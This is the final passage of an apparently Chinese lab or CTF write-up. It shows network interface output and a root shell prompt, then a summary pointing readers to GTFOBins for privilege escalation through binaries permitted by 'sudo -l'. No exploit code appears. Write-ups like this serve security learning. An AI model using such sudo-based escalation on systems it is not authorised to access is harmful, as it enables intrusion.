inet 192.168.92.145/24 brd 192.168.92.255 scope global dynamic ens33
valid_lft 1594sec preferred_lft 1594sec
inet6 fe80::319d:2d59:25c4:64b1/64 scope link
valid_lft forever preferred_lft forever
root@ubuntu:~#
搞定收工!
总结:这里需要了解一个网站gtfobins网站https://gtfobins.github.io/这个网站可以了解:sudo -l 命令下的自动任务使用提权用法。
浙公网安备 33010602011771号